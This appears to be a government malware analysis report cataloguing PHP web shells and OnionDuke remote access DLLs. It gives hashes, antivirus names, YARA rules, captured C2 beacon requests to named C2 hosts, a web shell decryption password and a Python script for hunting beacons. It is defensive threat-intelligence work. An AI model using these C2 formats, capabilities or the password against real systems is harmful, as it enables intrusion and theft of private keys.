F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aax 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.D 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. 
Analysis indicates that the web shell is accessed and executed through a browser by a remote user. The file prompts the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


0fd05095e5d2fa466bef897105dd943de29f6b585ba68a7bf58148767364e73e 


Details 

Name      0fd05095e5d2fa466bef897105dd943de29f6b585ba68a7bf58148767364e73e 
Size      21377 
Type      PHP script, ASCII text, with very long lines 
MD5       128cc715b25d0e55704ed9b4a3f2ef55 
SHA1      93c3607147e24396cc8f508c21ce8ab53f9a0176 
ssdeep    384:zvAz7TvcjKJp0eJ4ZZXIoQW9fq3C3W/e3+M/BF9xjzAMbaQCUv:jAzMjAp0/Xlq9fq3CWoEUv 
Entropy   6.10186106747 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AXV 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aau 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.D 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. 
Analysis indicates that the web shell is accessed and executed through a browser by a remote user. The file prompts the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


1343c905a9c8b0360c0665efa6af588161fda76b9d09682aaf585df1851ca751 


Details 

Name      1343c905a9c8b0360c0665efa6af588161fda76b9d09682aaf585df1851ca751 
Size      21355 
Type      PHP script, ASCII text, with very long lines 
MD5       f3ecf4c56f16d57b260b9cf6ec4519d6 
SHA1      18eda2d7b0d42462cdef1794ad26e21a52d79dc6 
ssdeep    384:DliH2ER39l1Vv+klPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUV:Dly2ER3CL+khWUYcsJtMcDiuSA93Dux0 
Entropy   6.09871136883 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aav 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.G 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. 
Analysis indicates that the web shell is accessed and executed through a browser by a remote user. The file prompts the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 
2d5afec034705d2dc398f01c100636d51eb446f459f1c2602512fd26e86368e4 


Details 

Name      2d5afec034705d2dc398f01c100636d51eb446f459f1c2602512fd26e86368e4 
Size      21377 
Type      PHP script, ASCII text, with very long lines 
MD5       7fce89d5e3d59d8e849d55d604b70a6f 
SHA1      a0a6978f7022f71ad977760f492704216318b5cd 
ssdeep    384:Zo01rROapTrdj4hK2leJYORHxrPIHzDUCuJYL3Q3QX6imKrV3XVPeezCv:ZR1rxlOk2IJYORRyBg3XIKpnVPee+v 
Entropy   6.10129283354 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.abb 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.D 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. At 
runtime the payload is decoded and decrypted using a combination of base64_decode and a password. This password is submitted via 
a POST request or in a cookie at runtime. The password "|F3Jk~6k6" was used to decrypt the payload. The decrypted payload 
contains a PHP web shell and has been identified as P.A.S. v.3.1.0. This web shell is a backdoor that, once installed on the compromised 
system, provides a remote user an interface for various remote operations, such as a file explorer, searcher, SQL client, network tools, 
command shell access, and server information features. The following are some of the P.A.S. web shell capabilities: 

-Begin Capabilities- 

View compromised server information. 

File manager (copy, rename, move, download, upload, delete, jump, create files and folders). 

Search files, objects, directories, and text in files. 

SQL client to log in and dump databases and tables. 

Network console with bind-port, back-connect, and port-scanner functions. 

Command line console to execute commands. 

Execute PHP code. 

-End Capabilities- 

The web shell interface is shown in image 1.0. 


3bd682bb7870d5c8bc413cb4e0cc27e44b2358c8fc793b934c71b2a85b8169d7 


Details 

Name      3bd682bb7870d5c8bc413cb4e0cc27e44b2358c8fc793b934c71b2a85b8169d7 
Size      21612 
Type      PHP script, ASCII text, with very long lines, with CRLF line terminators 
MD5       e80f92faa5e11007f9ffea6df2297993 
SHA1      2c48e42c882b45861557ea1f139f3e8b31629c7c 
ssdeep    384:FflOAr6OucUytsS8UdzMV3u2SmsyCDHEToBCGIbGA3taDPWA+0BWdLh:FfUAr6OJB18Cc3u2jseTo/cGA3taD+Aq 
Entropy   6.11927531623 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aas 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.G 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. Analysis indicates that the web shell is accessed and 
executed through a browser by a remote user. The file prompts the user to enter a password. The password entered is submitted via 
$_POST and stored in a cookie at runtime. The embedded payload is decoded and decrypted using a combination of base64_decode 
and a password. The password was not part of the submission. 


449e7a7cbc393ae353e8e18b5c31d17bb13235d0c07e9e319137543608749602 


Details 

Name      449e7a7cbc393ae353e8e18b5c31d17bb13235d0c07e9e319137543608749602 
Size      21667 
Type      PHP script, ASCII text, with very long lines 
MD5       66948b04173b523ca773c3073afb506d 
SHA1      e1ad80b0769b8b9dfb357a410af948127aabda97 
ssdeep    384:C0LnByNA3w1C7+mUsR+3oGzY0esuvDDqpEhlqdbf1oZP4jihXro8AtoGXz:C0FgJXoGzY0mDDblqNYP4jihXroltoGj 
Entropy   6.09992131729 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aap 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Avira                 PHP/Agent.12664 
Microsoft             Backdoor:PHP/Fobushell.G 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. 
Analysis indicates that the web shell is accessed and executed through a browser by a remote user. The file prompts the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


7dac01e818bd5a01fe75c3324f6250e3f51977111d7b4a94e41307bf463f122e 


Details 

Name      7dac01e818bd5a01fe75c3324f6250e3f51977111d7b4a94e41307bf463f122e 
Size      21445 
Type      PHP script, ASCII text, with very long lines, with CRLF line terminators 
MD5       a5e933d849367d623d1f2692b6691bbf 
SHA1      b788dce411fe0e1e1b7b476184aa6bbd0f8e3e31 
ssdeep    384:5WermnyinsjQ+b3f+qzolbopGdiWy6diduFrg:5XaytEm3GCpGdMuFrg 
Entropy   6.11582358023 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aaq 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Avira                 PHP/Agent.12661 
Microsoft             Backdoor:PHP/Fobushell.G 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. 
Analysis indicates that the web shell is accessed and executed through a browser by a remote user. The file prompts the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


9376e20164145d9589e43c39c29be3a07ecdfd9c5c3225a69f712dc0ef9d757f 


Details 

Name      9376e20164145d9589e43c39c29be3a07ecdfd9c5c3225a69f712dc0ef9d757f 
Size      21182 
Type      PHP script, ASCII text, with very long lines 
MD5       dc4594dbeafbc8edfa0ac5983b295d9b 
SHA1      82c4d3753a8ee26f0468e79bf5d90ada04c612ea 
ssdeep    384:5e0nReo3P8WiT/7AxG7+4g6NdSB1env3qnEkgAFHJNdfoNuWs3yYKGYWZ0QxzTFI:5Rzl/sxG7+762Be0skJNdfoNuWVbWZ0V 
Entropy   6.10088739359 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.abd 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.G 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. 
Analysis indicates that the web shell is accessed and executed through a browser by a remote user. The file prompts the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


a0c00aca2f34c1f5ddcf36be2ccca4ce63b38436faf45f097d212c59d337a806 


Details 

Name      a0c00aca2f34c1f5ddcf36be2ccca4ce63b38436faf45f097d212c59d337a806 
Size      21191 
Type      PHP script, ASCII text, with very long lines 
MD5       1ec7f06f1ee4fa7cecd17244eec24e07 
SHA1      ae167bca0863cfccba9cc9cf5e3cafce6fa6b92c 
ssdeep    384:s7ueraQSysFXnTPy9U3KRpzOx8Q1wKM5ivFV8rfAcrOf+U8zVYG:32sFXTPy9U3Qze8SwK2iooEOmKG 
Entropy   6.1011365049 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aba 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.G 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. 
Analysis indicates that the web shell is accessed and executed through a browser by a remote user. The file prompts the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 


bd7996752cac5d05ed9d1d4077ddf3abcb3d291321c274dbcf10600ab45ad4e4 


Details 

Name      bd7996752cac5d05ed9d1d4077ddf3abcb3d291321c274dbcf10600ab45ad4e4 
Size      21377 
Type      PHP script, ASCII text, with very long lines 
MD5       70f93f4f17d0e46137718fe59591dafb 
SHA1      1e49a68c72ef40e8c333007a7e7f56de1b29c842 
ssdeep    384:ENH2ER39I1Vv+klPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUort:Ely2ER3CL+khWUYcsJtMcDiuSA93Duxf 
Entropy   6.09482710893 


Antivirus 

F-prot                PHP/WebShell.A 
McAfee                PHP/WebShell.i 
F-secure              Backdoor.PHP.AYP 
VirIT                 Trojan.PHP.Shell.LV 
Symantec              PHP.Backdoor.Trojan 
ClamAV                Php.Malware.Agent-5486261-0 
Kaspersky             Backdoor.PHP.Agent.aaw 
TrendMicro            PHP_WEBSHELL.SMA 
Sophos                PHP/WebShell-O 
Microsoft             Backdoor:PHP/Fobushell.G 
Ahnlab                PHP/Webshell 
ESET                  PHP/Kryptik.AJ trojan 
TrendMicroHouseCall   PHP_WEBSHELL.SMA 
Ikarus                Trojan.PHP.Crypt 


Description 

This file is a malicious PHP file containing an embedded obfuscated payload. The payload is Base64 encoded and password protected. 
Analysis indicates that the web shell is accessed and executed through a browser by a remote user. The file prompts the user to 
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime. 
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55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641 


Details 


Name 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641 
Size 435712 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 
8f 154d23a c2071 d7f179959aa ba37ad5 
8ccaa941af229cf57a0a97327d99a46f989423f0 

6144:khqxVdwaTzQ87IWjZA1azReeoqbRAnXccmGRAVckV2pfLHWiDlu:2qq+t74ak2tAscmPckV2pfLHWulu 

6.40456212225 


Antivirus

F-prot               W32/Trojan3.XZP
McAfee               OnionDuke-FDMS
K7                   Trojan (0007c0301)
Systweak             trojan.agent
F-secure             Trojan.Generic.20173242
Symantec             Trojan.Cozer.B
ClamAV               Win.Trojan.OnionDuke-5486244-0
Kaspersky            Backdoor.Win32.MiniDuke.bz
QuickHeal            Backdoor.OnionDuke
TrendMicro           BKDR_COZER.LP
Sophos               Troj/Agent-AUWH
Avira                TR/AD.OnionDuke.ntjop
Microsoft            Backdoor:Win32/OnionDuke!dha
Ahnlab               Malware/Win32.Generic
ESET                 a variant of Win32/Agent.WPL trojan
NANOAV               Trojan.Win32.MiniDuke.ekecow
TrendMicroHouseCall  BKDR_COZER.LP
Ikarus               Trojan.Win32.Agent
AVG                  Agent5.AWKU


PE Information

Compiled  2014-12-18T21:40:51Z

PE Sections

Name      MD5                               Raw Size  Entropy
(header)  d16ea137e45c3186e912c69ef544df30  1024      2.47959457145
.text     d3be0c71767bb8f7976fb66e2d3b6611  338432    6.44965994232
.rdata    be8b2bc2020e9e8b5142b2231f2e028c  68608     4.7082956177
.data     f8d519621401eb9057c8ed71bb5902bc  8192      5.27710543994
.reloc    24a204634cd51c19590a4e0eac7ab8fe  19456     6.54348162441

Packers

Name                      Version  Entry Point
Borland Delphi 3.0 (???)  NA       NA

Relationships

(F) 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641 (8f154)   Connected_To   (D) private.directinvesting.com

Description

This file is a Windows DLL. It has been identified as a fully functioning remote access tool providing a broad set of command and control capabilities. The program uses a secure-strings routine to unpack, at runtime, strings used by multiple parts of the application. Displayed below is a YARA signature which may be used to detect this application; it is based primarily on the code of that secure-strings routine together with the certificate-store API names the tool references.

—Begin YARA Signature—

rule unidentified_malware
{
    meta:
        Author = "US-CERT Code Analysis Team"
        Date = "16JAN17"
        Incident = 10105049
        MD5 = "8F154D23AC2071D7F179959AABA37AD5"
    strings:
        $my_string_one = { 8D 78 03 8A 65 FF 8D A4 24 00 00 00 00 8A 04 0F 32 C4 88 04 11 41 3B CE 72 F3 }
        $my_string_two = "CryptAcquireCertificatePrivateKey"
        $my_string_three = "CertFreeCertificateContext"
        $my_string_four = "CertEnumCertificatesInStore"
        $my_string_five = "PFXImportCertStore"
    condition:
        all of them
}

—End YARA Signature—

During runtime, the malware attempts to communicate with its C2 server, private.directinvesting.com. Displayed below are sample connections between the malware and its C2 server.

—Begin Sample C2 Connections—

GET /lexicon/index.cfm?dq=d9487&pg=149a8d6adb73d479e66c6 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

GET /lexicon/index.cfm?source=0887a&css=b9&utm_term=80aaeb73d479e66c6&f=12 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

GET /lexicon/index.cfm?utm_content=876b73d479e66c6&source=19bd05efa8c HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

—End Sample C2 Connections—

The application attempts to download data from the C2 server and write it to a randomly named .tmp file in the user's %TEMP% directory. Some of the file names used to store this downloaded data in our lab environment are displayed below. Because Windows itself creates Cab*.tmp and Tar*.tmp files in %TEMP% when it expands cabinet files, these names are a weak indicator on their own and should be correlated with the network activity above.

—Begin Sample File Names—

TEMP\Cab1D5.tmp
TEMP\Cab1D7.tmp
TEMP\Cab1DA.tmp
TEMP\Cab1DC.tmp

—End Sample File Names—

Analysis indicates this application provides several notable capabilities to an operator: a reverse shell on the victim system; enumeration of the victim's Windows Certificate Store and extraction of the identified digital certificates, including their private keys; and enumeration of all physical drives and network resources the victim system has access to.
9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0

Details

Name     9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0
Size     434688
Type     PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5      ae7e3e531494b201fbf6021066ddd188
SHA1     e9fb290ab3a57dd50f78596b3bb3d373f4391794
ssdeep   6144:OTnkkw+XyCBoxqNyK1flVldm4EGJAAyom6YAhaf7iBXBj12SHWM7Dx:OTn3C3xqXf/OAZom6jhQiBXBZ2SHWOx
Entropy  6.4095074296


Antivirus

F-prot               W32/Trojan3.XZO
McAfee               OnionDuke-FDMS
K7                   Trojan (0007c0301)
Systweak             trojan.agent
F-secure             Trojan.Generic.20173160
Symantec             Trojan.Cozer.B
ClamAV               Win.Trojan.OnionDuke-5486245-0
Kaspersky            Backdoor.Win32.MiniDuke.cb
QuickHeal            Backdoor.OnionDuke
TrendMicro           BKDR_COZER.LP
Sophos               Troj/Agent-AUWH
Avira                TR/AD.OnionDuke.trltr
Microsoft            Backdoor:Win32/OnionDuke!dha
Ahnlab               Malware/Win32.Generic
ESET                 a variant of Win32/Agent.WPL trojan
NANOAV               Trojan.Win32.AD.ekdqnf
TrendMicroHouseCall  BKDR_COZER.LP
Ikarus               Trojan.Win32.Agent
AVG                  Agent5.AWKV


PE Information

Compiled  2014-12-18T19:08:53Z

PE Sections

Name      MD5                               Raw Size  Entropy
(header)  38153f895d4b391ee08f3a0814df439a  1024      2.48999986641
.text     41ed1207da910058e1882426b9627644  337920    6.45016237717
.rdata    27694317558299dd1609b4f476d7141f  68608     4.70267295411
.data     b65dd078b5a24ec0a223fdf6b3ed134a  8192      5.29144751488
.reloc    bc8ec2f7707d0a33f9663235cfb2a4ea  18944     6.5984520808

Packers

Name                      Version  Entry Point
Borland Delphi 3.0 (???)  NA       NA

Relationships

(F) 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 (ae7e3)   Connected_To       (D) cderlearn[.]com
(F) 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 (ae7e3)   Characterized_By   (S) digital_cert_steal.bmp

Description

This file is a Windows DLL. It has been identified as a fully functioning remote access tool providing a broad set of command and control capabilities. The program uses a secure-strings routine to unpack, at runtime, strings used by multiple parts of the application. Displayed below is a YARA signature which may be used to detect this application; it is based primarily on the code of that secure-strings routine together with the certificate-store API names the tool references.


—Begin YARA Signature—

rule unidentified_malware
{
    meta:
        Author = "US-CERT Code Analysis Team"
        Date = "16JAN17"
        Incident = 10105049
        File = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
        MD5 = "AE7E3E531494B201FBF6021066DDD188"
    strings:
        $my_string_one = { 8D 78 03 8A 65 FF 8D A4 24 00 00 00 00 8A 04 0F 32 C4 88 04 11 41 3B CE 72 F3 }
        $my_string_two = "CryptAcquireCertificatePrivateKey"
        $my_string_three = "CertFreeCertificateContext"
        $my_string_four = "CertEnumCertificatesInStore"
        $my_string_five = "PFXImportCertStore"
    condition:
        all of them
}

—End YARA Signature—

During runtime, the malware attempts to communicate with its C2 server, cderlearn[.]com. Displayed below are sample connections between the malware and its C2 server.

—Begin Sample C2 Connections—

POST /search.cfm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www[.]cderlearn.com
Content-Length: 38
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

rss=a5ce5fa&pg=f8&sa=8816db73d479e8e35

POST /search.cfm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www[.]cderlearn.com
Content-Length: 46
Cache-Control: no-cache

id=3&source=a804b4b73d479eebea&rss=53d0&ei=d3c

—End Sample C2 Connections—

The application attempts to download data from the C2 server and write it to a randomly named .tmp file in the user's %TEMP% directory. Some of the file names used to store this downloaded data in our lab environment are displayed below:

—Begin Sample File Names—

TEMP\Cab5.tmp
TEMP\Tar6.tmp
TEMP\Cab7.tmp
TEMP\Tar8.tmp

—End Sample File Names—

Analysis indicates this application provides several notable capabilities to an operator: a reverse shell on the victim system; enumeration of the victim's Windows Certificate Store and extraction of the identified digital certificates, including their private keys; and enumeration of all physical drives and network resources the victim system has access to.
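The five captures in this and the previous sample's description share one User-Agent, two ColdFusion (.cfm) endpoints and, less obviously, a fixed hex token inside parameters whose names rotate from request to request. The Python below is an added example, not code from the report or from the malware: it parses raw requests as a proxy might log them, flags beacons by known host or by C2 path plus User-Agent, and extracts the longest hex substring common to all flagged requests. Hosts, paths and the User-Agent come from the report; the raw-request log format, the benign decoy request and the 10-character minimum for "hex-looking" values are assumptions.

```python
"""Hunt proxy-logged HTTP requests for the OnionDuke beacons shown in the two sample descriptions.

Added example: not from AR-17-20045 and not the malware's code. Hosts, paths and the
User-Agent are taken from the report; the raw-request log format, the benign decoy
request and the 10-character minimum for hex-looking values are assumptions.
"""
import re
from urllib.parse import parse_qsl, urlsplit

C2_HOSTS = {"private.directinvesting.com", "cderlearn.com", "www.cderlearn.com"}
C2_PATHS = {"/lexicon/index.cfm", "/search.cfm"}
# Both samples send this XP-era IE6 User-Agent. Genuine old clients sent it too, so it
# only counts as evidence together with one of the ColdFusion paths above.
BEACON_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; "
             ".NET CLR 3.0.04506.648; .NET CLR 3.5.21022)")
HEX_VALUE = re.compile(r"^[0-9a-f]{10,}$")


def parse_request(raw):
    """Split one raw HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _sep, body = raw.strip("\r\n").partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _colon, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def beacon_reasons(req):
    """Why this request looks like an OnionDuke check-in (empty list if it does not)."""
    host = req["headers"].get("host", "").lower()
    path = urlsplit(req["target"]).path
    reasons = []
    if host in C2_HOSTS:
        reasons.append("known C2 host")
    if path in C2_PATHS and req["headers"].get("user-agent") == BEACON_UA:
        reasons.append("C2 path with legacy IE6 User-Agent")
    return reasons


def hex_values(req):
    """Long hex-looking parameter values from the query string and, for POSTs, the body."""
    pairs = parse_qsl(urlsplit(req["target"]).query)
    if req["method"] == "POST":
        pairs += parse_qsl(req["body"])
    return [value for _key, value in pairs if HEX_VALUE.match(value)]


def shared_hex_substring(value_lists):
    """Longest substring present in at least one value of every non-empty list."""
    value_lists = [values for values in value_lists if values]
    if not value_lists:
        return ""
    seed = min(value_lists[0], key=len)
    for length in range(len(seed), 0, -1):
        for start in range(len(seed) - length + 1):
            candidate = seed[start:start + length]
            if all(any(candidate in v for v in values) for values in value_lists[1:]):
                return candidate
    return ""


def hunt(raw_requests):
    """Return the flagged requests and the hex token their rotating parameters share."""
    hits = []
    for raw in raw_requests:
        req = parse_request(raw)
        reasons = beacon_reasons(req)
        if reasons:
            hits.append({"host": req["headers"].get("host"), "target": req["target"],
                         "reasons": reasons, "hex": hex_values(req)})
    return hits, shared_hex_substring([hit["hex"] for hit in hits])


def _raw(method, target, host, body=""):
    """Build a raw request in the shape of the report's captures (constructed)."""
    lines = [f"{method} {target} HTTP/1.1", f"User-Agent: {BEACON_UA}", f"Host: {host}",
             "Connection: Keep-Alive", "Cache-Control: no-cache", "Pragma: no-cache"]
    if body:
        lines += ["Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


# The five sample connections from the report, plus one constructed benign request
# that reuses the same User-Agent to show the UA alone does not produce a hit.
SAMPLE_REQUESTS = [
    _raw("GET", "/lexicon/index.cfm?dq=d9487&pg=149a8d6adb73d479e66c6", "private.directinvesting.com"),
    _raw("GET", "/lexicon/index.cfm?source=0887a&css=b9&utm_term=80aaeb73d479e66c6&f=12",
         "private.directinvesting.com"),
    _raw("GET", "/lexicon/index.cfm?utm_content=876b73d479e66c6&source=19bd05efa8c",
         "private.directinvesting.com"),
    _raw("POST", "/search.cfm", "www.cderlearn.com", "rss=a5ce5fa&pg=f8&sa=8816db73d479e8e35"),
    _raw("POST", "/search.cfm", "www.cderlearn.com", "id=3&source=a804b4b73d479eebea&rss=53d0&ei=d3c"),
    _raw("GET", "/index.html", "www.example.com"),
]

if __name__ == "__main__":
    hits, token = hunt(SAMPLE_REQUESTS)
    for hit in hits:
        print(hit["host"], hit["target"], hit["reasons"])
    print("shared hex token across beacons:", token or "(none)")
```

Run as a script it reports the five hits and the token b73d479e, which sits inside a long hex value in every sampled request to both C2 domains while the surrounding parameter names (pg, utm_term, utm_content, sa, source) rotate. The report does not say what that token encodes, so treat it as a hypothesis (victim, campaign or build identifier) to test against a larger capture rather than as an indicator in itself, and do not alert on the User-Agent alone, since real Windows XP clients sent the same string.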
Screenshots

• digital_cert_steal.bmp

Screenshot of code used by 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 to steal a victim user's digital certificates from the Windows Certificate Store.


ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e

Details

Name     ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e
Size     714679
Type     Rich Text Format data, version 1, unknown character set
MD5      81f1af277010cb78755f08dfcc379ca6
SHA1     9cb7716d83c0d06ab356bdfa52def1af64bc5210
ssdeep   3072:0gOxPV0p1knm8Z0gPJQ3kq9d6AvgBodb30aCubtvn7JBsEitau3QCv:jOBVs1knm8ZPJQ3kqoodkuZjlbVY
Entropy  3.29548128269


Antivirus

F-prot               W32/Dridex.HX
McAfee               Fareit-FHF
NetGate              Trojan.Win32.Malware
F-secure             Gen:Variant.Razy.41230
Symantec             Trojan.Fareit
VirusBlokAda         TrojanPSW.Fareit
ClamAV               Win.Trojan.Agent-5486255-0
Kaspersky            Trojan-PSW.Win32.Fareit.bshk
TrendMicro           TROJ_FA.6BBF19ED
Sophos               Troj/Fareit-AMQ
Avira                TR/AD.Fareit.Y.ehkw
Microsoft            PWS:Win32/Fareit
Ahnlab               RTF/Dropper
NANOAV               Trojan.Rtf.Stealer.efqzyl
TrendMicroHouseCall  TROJ_FA.6BBF19ED
Ikarus               Trojan.Win32.Zlader


Relationships

(F) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e (81f1a)   Dropped            (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)
